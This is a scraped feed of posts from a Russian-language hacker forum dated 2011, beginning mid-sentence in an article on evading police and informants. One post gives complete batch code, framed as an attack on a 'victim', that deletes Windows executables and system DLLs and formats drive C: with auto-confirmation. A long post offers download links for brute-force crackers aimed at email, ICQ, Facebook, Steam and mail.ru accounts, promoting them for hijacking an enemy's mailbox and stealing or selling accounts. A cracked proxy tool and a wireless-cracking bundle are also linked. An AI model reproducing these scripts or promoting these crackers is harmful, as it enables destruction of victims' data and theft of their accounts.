вообще молчу) устанавливают антивирусы, поэтому без всяких СОРМ тебя можно повязать, статьи 272, 273 могут обеспечить зажигательный отдых в местах не столь отдаленных до 3 лет + штраф.Профессионалам, которые ни когда не хакали из одного и того же места, в обязательном порядке использовали АнтиАОН и пересылали любую компрометирующую информацию в зашифрованном виде, удавалось на неопределенное время оттягивать свое пребывание на свободе. </p> <p>Засланцы.</p> <p>Есть еще один род опасности, о котором многие, в частности, молодые дефейсеры, даже не задумываются — это засланцы от федералов. Представь, ты общаешься в чате, обсуждаешь предстоящие или совершенные взломы, радуешься жизни, а в это время один из участников, причем которого все считают за своего, бережно сохраняет логи и пересылает их на доклад вышестоящему начальству. Затем вы собираетесь в реале, бухаете, оттягиваетесь, а в это время неизвестный человек, который уже заранее знал о вашей встрече, делает снимки скрытой камерой и т. д. Я, думаю, ты понял, куда я клоню. Стать своим в российских т. н. «хакерских» тусах совсем не сложно, достаточно похвастаться парочкой дефейсов и тебе откроются самые приватные базары. В зарубежных сложнее, нужно сделать что-то существенное, чтобы на тебя обратили хоть немного внимания (но для спецслужб это не должно быть проблемой). Засланцы внедрены во многие преступные группировки, шпионы работают на секретных предприятиях иностранных государств, доносчики следят за высокопоставленными лицами... было бы странно, если бы спецслужбы не догадались внедрить своих людей и в хакерское сообщество. Возможно, многие, кто сейчас отдыхает на нарах, ломают голову: «В чем же была моя ошибка? Как меня смогли повязать?» и даже не думают, что тот прикольный чел в IRC, с которым они вместе рутили не один десяток машин является самым настоящим двуличным засланцем.</p> <p>Профессионалы объединяются в команды и ведут приватные разговоры только с теми, в ком уверены на все 100% (обычно, гарантией является долгое личное знакомство в реал лайф).<br />Слово в заключении</p> <p>Заметь, в статье не было никаких прямых рекомендаций, советов и пр., никто не читал тебе проповеди, не отговаривал от совершения черных дел и уж тем более не толкал на преступления. Статья рассчитана на думающих людей, надеюсь, ты относишься к их числу.</p> <p>Источник sklyaroff.ru</p> mybb@mybb.ru (-=PRELIATUS=-) Fri, 01 Apr 2011 17:46:17 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=61#p61 http://indogohacker.forumbb.ru/viewtopic.php?pid=59#p59 <p>Вслед за Mail.ru, пользователи социальной сети &quot;В Контакте&quot; получили возможность комментировать записи на сервисе блогов LiveJournal через профиль &quot;В Контакте&quot;. Вчера об аналогичном функционале объявила компания Mail.ru, сообщившая, что c сервисом LiveJournal была создана единая система авторизации.</p> <p>Через авторизацию &quot;В Контакте&quot; стало доступным не только комментирование записей ЖЖ, но и добавление пользователей в друзья, чтение френдленты. Как сообщили представители компаний, в скором времени будет введена возможность связывания «В Контакте» и LiveJournal-аккаунтов и обратного кросспостинга записей из LiveJournal на стену социальной сети &quot;В Контакте&quot;.</p> <p>«Livejournal стал первым проектом, который использует нашу авторизацию на базе открытого стандарта OAuth 2.0. В скором времени эта возможность быстрой интеграции с нами будет доступна всем проектам», — заявил руководитель отдела разработки &quot;В Контакте&quot; Андрей Рогозов.</p> mybb@mybb.ru (-=PRELIATUS=-) Fri, 01 Apr 2011 17:42:29 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=59#p59 http://indogohacker.forumbb.ru/viewtopic.php?pid=57#p57 <p>Хакеры научились подчинять себе автомобили. Впрочем, пока в качестве компьютерных взломщиков выступили американские ученые. Они утверждают, что влезть в электронные мозги машины не так уж и сложно. К чему может привести хакерство автомобилей, разбирался корреспондент радио &quot;Вести ФМ&quot;Сергей Гололобов.</p> <p>Гололобов: Впервые взлом электроники автомобиля осуществили ученые из Вашингтона и Калифорнии. Через диагностический разъем они подсоединились к бортовому компьютеру и запустили вредоносную программу CarShark. Эта программа может глушить двигатель, блокировать двери, нагнетать горячий воздух в салон и доставлять другие неприятности водителю. При этом, чем дороже автомобиль, тем больше в нем электроники, и тем уязвимее она для хакерской атаки, - считает независимый эксперт Михаил Генин.Генин: Появились компьютеры, которые управляют всем в машине, особенно в дорогих моделях, которые даже по кнопке двигатель запускают, и без компьютеров в машине ничего не делается. Соответственно, в этом компьютере можно как-то что-то накрутить.</p> <p>Гололобов: Другое дело, у разных автопроизводителей разные операционные системы. И это не Windows и не Linux. Каждый делает свой софт. А это автоматически усложняет компьютерный взлом, отмечает Михаил Генин.</p> <p>Генин: Поэтому какого-то вируса для каждой машины бояться не стоит. Так, для каждой марки придется какие-то свои штуки вредоносные писать. Достаточно большая работа, и вряд ли кто-то это будет делать. Так, какие-то любители попробовали что-то сделать, но не более того. Я думаю, что CarShark и все прочие штуки - это мифы больше интернетовские. Так что, я думаю, для реальных пользователей даже очень умных машин, на данный момент опасности никакой нет.</p> <p>Гололобов: Кроме того, чтобы подсоединиться к диагностическому разъему, нужно попасть в салон автомобиля, а раз злоумышленник туда влез, то ему проще угнать автомобиль, чем заниматься хакерством, полагают эксперты... Другим путем пошли ученые Рутгерского университета и Университета Южной Каролины. Они доказали, что хакерскую атаку на машину можно произвести дистанционно, и даже в момент его движения. Сделали это они через датчики давления шин. Эти датчики используют радиочастоты для передачи информации. Как утверждают экспериментаторы, при помощи этого сигнала им удалось отслеживать транспортные средства и вмешиваться в их работу. Российские эксперты скептически относятся к этой информации. Ничего серьезного через датчик давления шин внедрить в блок электронного управления автомобиля невозможно, считает обозреватель журнала &quot;Авторевю&quot; Константин Сорокин.</p> <p>Сорокин: Там используется сигнал на частоте 433 МГГЦ, который передается от датчика в колесе на некое приемное устройство, которое интегрировано чаще всего в переднюю панель. И это односторонняя передача, и идет аналоговый нешифрованный сигнал, очень короткая посылка. И даже если каким-то образом этот канал будет подавлен, ну, загорится лампочка &quot;неисправность&quot;, и что? Автомобиль будет продолжать ехать, причем здесь хакеры-то?</p> <p>Гололобов: Впрочем, все может измениться через лет пять-десять. Когда электроники в автомобилях станет еще больше, когда их компьютеры станут собирать информацию по большей части не по проводам, а по радиоканалам, и когда, наконец, программное обеспечение автомобилей будет унифицировано, т.е. появится какой-нибудь автомобильный Windows. Вот тогда, прогнозируют эксперты, автомобильное хакерство станет реальностью.</p> mybb@mybb.ru (-=PRELIATUS=-) Fri, 01 Apr 2011 17:33:39 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=57#p57 http://indogohacker.forumbb.ru/viewtopic.php?pid=56#p56 <p>Для начало предлогаю поучиться создавать файлы Bat</p> <p>Для написания нам понадобится любимая прога программеров Windows Commander. Запускаем ее. Нажимаем Shift+F4, пишем любое название файла, главное чтобы вы поставили расширение *.bat. Если вы сделали все правильно, то должен открыться блокнот. Теперь пишим в нем команды которые файл будет выполнять на чужом компе, помните все команды он делает последовательно.</p> <p>Грохаем windows на компе жертвы<br />Cd\ -команда для выхода в корневой каталог. <br />Cd C: -команда перехода на диск C, где почти у всех стоит виндовс. <br />Сd windows -переходим в папку Windows. <br />Del *.exe -удаяем все файлы с расширением .exe <br />Del *.ini -удаяем все файлы с расширением .ini <br />Del *.com - удаяем все файлы с расширением .com <br />Cd\ <br />Cd windows <br />Cd system <br />Del *.dll <br />Del *.exe</p> <p>Код полностью:</p> <p>Cd\ <br />Cd C: <br />Сd windows <br />Del *.exe <br />Del *.ini <br />Del *.com <br />Cd\ <br />Cd windows <br />Cd system <br />Del *.dll <br />Del *.exe</p> <p>Теперь закрываем блокнот и видим, что создался файл install.bat.</p> <p>Но вдруг папка виндовс называется не windows, а winMe, да без проблем:</p> <p>Cd\ <br />Cd C: <br />Сd windows <br />Del *.exe <br />Del *.ini <br />Del *.com <br />Cd\ <br />Cd windows <br />Cd system <br />Del *.dll <br />Del *.exe <br />Cd\ <br />Cd C: <br />Сd winMe <br />Del *.exe <br />Del *.ini <br />Del *.com <br />Cd\ <br />Cd win98 <br />Cd system <br />Del *.dll <br />Del *.exe</p> <p>Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте. Только помните, что такое можно делать, если на машине жертвы стоит Windows 9Х.</p> <p>Форматируем диск С<br />Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat-файл. <br />Format C:\ -команда форматирования диска. <br />Y -команда автоматического согласие форматирование <br />Y <br />Y</p> <p>Вот и все.</p> <p>Код полностью:</p> <p>Cd\ <br />Format C:\ <br />Y <br />Y <br />Y</p> <p>Единственный минус. Такой код может не сработать, если на компе стоит Windows ME или XP. В этих форточках команда форматирования лежит не в папке Windows, а по следующему пути C:\WINDOWS\COMMAND\format.</p> <p>Код полностью:</p> <p>Cd\ <br />C:\WINDOWS\COMMAND\format c: /autotest</p> mybb@mybb.ru (-=LEXHACK=-) Fri, 01 Apr 2011 09:25:48 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=56#p56 http://indogohacker.forumbb.ru/viewtopic.php?pid=53#p53 <p>слушай, а к у тя есть какой нить хорошоий авторегер?</p> mybb@mybb.ru (Fan 44 Rus) Thu, 31 Mar 2011 00:44:15 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=53#p53 http://indogohacker.forumbb.ru/viewtopic.php?pid=50#p50 <p>Скрываем IP при помощи браузера Opera и программы <a href="http://letitbit.net/download/71573.7bb397a515eefb8e97046505d5c2/ProxyFinderEnt-v2.5.rar.html" rel="nofollow" target="_blank">Proxy Finder Enterprise</a> и не забываем про кряк...)))<br />Сайты которые использовались в видео <a href="http://2ip.ru/" rel="nofollow" target="_blank">http://2ip.ru/</a> для проверки IP и <a href="http://cp1251.darkoff.ru/proxychecker/" rel="nofollow" target="_blank">http://cp1251.darkoff.ru/proxychecker/</a> для сканирования прокси...<br />Удачи :jumping:&#160; </p> <p></p> mybb@mybb.ru (-=PRELIATUS=-) Wed, 30 Mar 2011 16:39:45 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=50#p50 http://indogohacker.forumbb.ru/viewtopic.php?pid=49#p49 <p>Данная сборка представляет набор самых лучших и мощных программ для обнаружения, мониторинга и взлома беспроводных сетей. Все программы объеденены в один общий интерфейс для удобства пользования, плюс руководства, плюс бонус (несколько сетевых утилит).</p> <p>Состав:<br />Windows Tools 1<br />WiresHark<br />AirSnare<br />WirelessKeyView<br />Wifi Monster<br />NetStumbler<br />Easy Wifi Radar<br />SmartSniff<br />Ettercap<br />WinPcap<br />CommView</p> <p>Windows Tools 2<br />Nmap<br />Wirelessmon<br />PocketWarrior<br />Inssider<br />RemoteAnyWhere<br />PmoniPacketMon<br />ApTools<br />WiFiFoFum<br />Advanced Port Scanner<br />NetSurveyor</p> <p>Backtrack<br />Enlace de descarga para BackTrack 4 Pre Release<br />Enlace de descarga para BackTrack 4 Beta Release<br />Enlace de descarga para BackTrack 3 VmWare Image<br />Enlace de descarga para BackTrack 3<br />Enlace de descarga para BackTrack 3 USB Version</p> <p>PDF.</p> <p><a href="http://letitbit.net/downloadl/57602.5969ef166ec9f3b34a370f8150c1/DFWFI_AIO.rar.html" rel="nofollow" target="_blank">КАЧАТЬ</a></p> mybb@mybb.ru (-=INDOGO=-) Wed, 30 Mar 2011 11:49:52 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=49#p49 http://indogohacker.forumbb.ru/viewtopic.php?pid=48#p48 <p><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/bbbbbb.jpg" alt="http://xaker26.siteedit.ru/images/bbbbbb.jpg" /><br />BrutusAET - это программа для подбора паролей по словарю к HTTP (Basic Auth), HTTP (Form), FTP, POP3, Telnet, SMB (NetBios), Custom, вообщем ко всему чему только можно.<br /><a href="http://depositfiles.com/ru/files/u7gvdactv" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/u7gvdactv</a><br />Пароль: 5555</p> <p><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/aaaaaaaa.jpg" alt="http://xaker26.siteedit.ru/images/aaaaaaaa.jpg" /><br />DukeNN Mail Bruter 3.03 [F I N A L] edition - хоть и старый но лучший брут форсер для мыло . Респект корефану (Дюкенн).</p> <p><a href="http://depositfiles.com/ru/files/cxsm9i1di" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/cxsm9i1di</a><br />Пароль: 5555</p> <p><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/rdorldrrdr.jpg" alt="http://xaker26.siteedit.ru/images/rdorldrrdr.jpg" /><br />Xavior v 1.0 beta 7<br />Автоматический подбор паролей к любым Internet-ресурсам.<br />Из особенностей можно отметить то, что при обрыве соединения она<br />запоминает свое текущее состояние и в дальнейшем может продолжить<br />работу с того места, где она была прервана.<br />Работает в многопоточном режиме, так что скорость перебора у него высока.<br />Кроме того, прога может работать спрятавшись за анонимным proxi-сервером,<br />что очень полезно.<br />Xavior v1.0 Beta7 - Инсталлируем, там ничего сложного и сверхъестественного, вот у нас уже есть оружие начинающего Хакера. Вот запустил ты эту прогу на своей тачке и видишь уродство и говоришь себе: &quot;Блин что это за убожество, отстой, ни картинок тебе, ни нормального ХЕЛПА...&quot; (у меня так и было...=) Но всё пока ты не понимаешь ценности этой вещи. Ну вот например я тебе напишу неполный список того что ты можешь сделать с помощью этой проги: подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку, поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее всё что твоей Хацкерской душеньке угодно (даже продать его=), раздобыть себе АККАУНТИК к ПОР***** и многое другое.<br /><a href="http://depositfiles.com/ru/files/oeajj1cnr" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/oeajj1cnr</a></p> <p><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/ppppppp.jpg" alt="http://xaker26.siteedit.ru/images/ppppppp.jpg" /><br />Xavior v 1.0 beta 7<br />Автоматический подбор паролей к любым Internet-ресурсам.<br />Из особенностей можно отметить то, что при обрыве соединения она<br />запоминает свое текущее состояние и в дальнейшем может продолжить<br />работу с того места, где она была прервана.<br />Работает в многопоточном режиме, так что скорость перебора у него высока.<br />Кроме того, прога может работать спрятавшись за анонимным proxi-сервером,<br />что очень полезно.<br />Xavior v1.0 Beta7 - Инсталлируем, там ничего сложного и сверхъестественного, вот у нас уже есть оружие начинающего Хакера. Вот запустил ты эту прогу на своей тачке и видишь уродство и говоришь себе: &quot;Блин что это за убожество, отстой, ни картинок тебе, ни нормального ХЕЛПА...&quot; (у меня так и было...=) Но всё пока ты не понимаешь ценности этой вещи. Ну вот например я тебе напишу неполный список того что ты можешь сделать с помощью этой проги: подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку, поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее всё что твоей Хацкерской душеньке угодно (даже продать его=), раздобыть себе АККАУНТИК к ПОР***** и многое другое.<br /><a href="http://depositfiles.com/ru/files/oeajj1cnr" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/oeajj1cnr</a><br /></p> <p>Yandex Brute - служит для взлома яндекса или электронной почты зарегистрированной на яндексе.<br /><a href="http://depositfiles.com/ru/files/6rbcbrrug" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/6rbcbrrug</a><br /><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/lrplp.jpg" alt="http://xaker26.siteedit.ru/images/lrplp.jpg" /></p> <p>ВСЕМ знакомый&#160; IPDbrute_2.0_Lite - брутус для взлома UIN:pssword в ICQ.<br /><a href="http://depositfiles.com/ru/files/jlbd0yvru" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/jlbd0yvru</a><br /><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/icqip_brute_v0_1.jpg" alt="http://xaker26.siteedit.ru/images/icqip_brute_v0_1.jpg" /></p> <p>icqip brute v0.1 - клёвый Брут для icq с не обычным интерфейсом не требующий прокси листа. Не знаю как 6, 7, 8 знаки но 9 знаки за чесов пять 25 нашёл)<a href="http://depositfiles.com/ru/files/k35lxqar5" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/k35lxqar5</a><br /><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/rip_by_dread_v0_1.jpg" alt="http://xaker26.siteedit.ru/images/rip_by_dread_v0_1.jpg" /></p> <p>Rip by Dread v0.1 - простой брутус для icq по UIN;PASS.Миниатюрен и очень прост в использовании, а самое главное работает без прокси.<br /><a href="http://depositfiles.com/ru/files/7mt5xtymb" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/7mt5xtymb</a><br /><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/icq_brute_v_1_0_by_fr_met.jpg" alt="http://xaker26.siteedit.ru/images/icq_brute_v_1_0_by_fr_met.jpg" /></p> <p>ICQ Brute v 1.0 by fR@meT - простой icq брутус. Прост в использовании, работает без прокси листа что облегчает с ним работу, легко сворачивается в трей и не мешает работе.<br /><a href="http://depositfiles.com/ru/files/evadmbtao" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/evadmbtao</a><br /><img class="postimg" loading="lazy" src="http://xaker26.siteedit.ru/images/mails_v1_7.jpg" alt="http://xaker26.siteedit.ru/images/mails_v1_7.jpg" /></p> <p>VerifyMails v1.7b - не плахой чекер мыла типа Брута. Чекает мыло на mail.com, yahoo.com, hongkong.com, xaker.ru, hotmail.ru, mailgate.ru, hotmail.com, mail.ru, aol.com. Также данная прога обновляется, есть возможность работать через прокси. Вы спросите а как ей чекать, А ЛЕГКО. Берёте любой генератор паролей к примеру Powerful GeneratoR, генерируете список паролей, берёте заготовленный лист с майломи засовываете в генератор паролей и туда же суёте сгенерированные пасы и соединяете всё. У вас должно получится типа того что вы видите в проге тобиш МЫЛО;ПАСС. Загружаете данный списак в прогу, выстанавливаете во сколько потоков вы хотите чтоб прога чекала мыльцы и жмёте старт. По окончанию работы в закладке ПОДХОДЯЩИЕ будут ваши подобранные мыльца, так же при закрытии проги подобранные мыльца будут находится в текстовом файле goodsave.txt.<br /><a href="http://depositfiles.com/ru/files/a361fkzc1" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/a361fkzc1</a><br /></p> <p>вот ещё парочка<br /><img class="postimg" loading="lazy" src="http://pro-xaker.do.am/_ld/3/s30954340.jpg" alt="http://pro-xaker.do.am/_ld/3/s30954340.jpg" /><br /></p> <p>Брут социальной сети Facebook.com</p> <p>Режимы брута:<br />Один логин + Список паролей (Не рекомендуется, т.к. идет блокировка аккаунта. Прокси не помогут)<br />Один пароль + Список логинов<br />Список &quot;логин;пароль&quot;<br />Список логинов + Список паролей<br />Тестирование показало, что успешно находится валидный аккаунт при бруте без прокси и после 10000 попыток (см. скриншот<br />пароль -&#160; avtuh.ru<br />скачать&#160; &#160;<a href="http://files.avtuh.ru/facebookBrute.rar" rel="nofollow" target="_blank">http://files.avtuh.ru/facebookBrute.rar</a><br /><img class="postimg" loading="lazy" src="http://s39.radikal.ru/i083/1005/eb/733f0d1f3fd2.jpg" alt="http://s39.radikal.ru/i083/1005/eb/733f0d1f3fd2.jpg" /></p> <p>Брут предназначен для восстановления забытого пароля к steam аккаунту.<br />Поддержка прокси (http,sock4/5)<br />Многопоточность<br />Встроенный чекер Аккаунтов<br />Хорошая скорость<br />Автоматическое сохранение good-ов.<br />Автоматическое сохранение error-ов.(для того чтобы можно было перебрутить аккаунты попавшие на ошибки соединения).</p> <p>Для начала работы:<br />Укажите в соответствующих полях txt файлы, один вида login;pass - список аккаунтов, второй proxy:port - прокси.<br />Затем укажите какой тип прокси использовать,укажите тайм аут коннекта прокси и жмите START.<br />Примечание:<br />1)Брут не реккомендуеться блондинкам<br />2)Поскольку на сайте без капчи можно ввести неверный пароль 2 раза - проксей надо очень много.<br />3)Если вам кажеться что брут остановился - значит у вас закончились прокси или логины.<br />4)Реккомендуеться использовать приватные прокси ибо с пабликом возможны ошибки подключения<br />скачать <a href="http://haksoft.ucoz.org/load/ss/1-1-0-8" rel="nofollow" target="_blank">http://haksoft.ucoz.org/load/ss/1-1-0-8</a><br />еси шо сайт мой&#160; &#160;и это не реклама<br />просто на компе есть</p> <p>Mail.ru SECRET Bruter - брут по секретному вопросу<br /><img class="postimg" loading="lazy" src="http://pro-xaker.do.am/news2/mail_secret_bruter.jpg" alt="http://pro-xaker.do.am/news2/mail_secret_bruter.jpg" /><br />Брутер секретных вопросов для mail.ru</p> <p>[+] Поддержка (mail.ru,list.ru,bk.ru,inbox.ru)<br />[+] Многопоточность<br />[+] Поддержка HTTP проксей</p> <p>[-] На один аккаунт брут не расчитан</p> <p>ссыль<br /><a href="http://depositfiles.com/ru/files/x20xh70vd" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/x20xh70vd</a></p> <p>2<br />PoisonBrut<br /><img class="postimg" loading="lazy" src="http://pro-xaker.do.am/news2/PM_brute.jpg" alt="http://pro-xaker.do.am/news2/PM_brute.jpg" /><br />думаю объяснять ничего не надо, все просто и видно на скрине.</p> <p>ну вот и обновление с потдержкой проксей, правда только носков,<br />и ради бога не используйте говнопрокси и не постите потом что все летит в эрроры.<br />настроики:<br />overwrite proxy - если галочка стоит брут в текстовике удалит дохлые прокси(через указанное количество минут и в конце брута)<br />use proxy - если галочка стоит идет прокси брут, иначе обычный<br />time out - тайм оут подключения в мсек, первая цифра для прокси сервера, вторая для почтового<br />proxy check - сколько неудачных попыток сконектица есть у проксика прежде чем брут его признает мертвым</p> <p>очередное обновление<br />добавлен брут по smtp серверу<br />добавлена потдержка http прокси(правда только тех которые потдерживают метод коннект)<br />пофиксины баги<br />удален вирус делфи инклуд :)</p> <p>очередное обновление<br />пофиксины очередные баги<br />полностью переделана работа с прокси<br />добавлена галочка good(и гуд тхт сохраняеться кроме мыла и пароля еще и колво писем)<br /><a href="http://letitbit.net/download/3431.3afebc04e7369c5aa7ff6e1df/PM.rar.html" rel="nofollow" target="_blank">http://letitbit.net/download/3431.3afeb &#8230; M.rar.html</a></p> mybb@mybb.ru (-=INDOGO=-) Wed, 30 Mar 2011 11:34:38 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=48#p48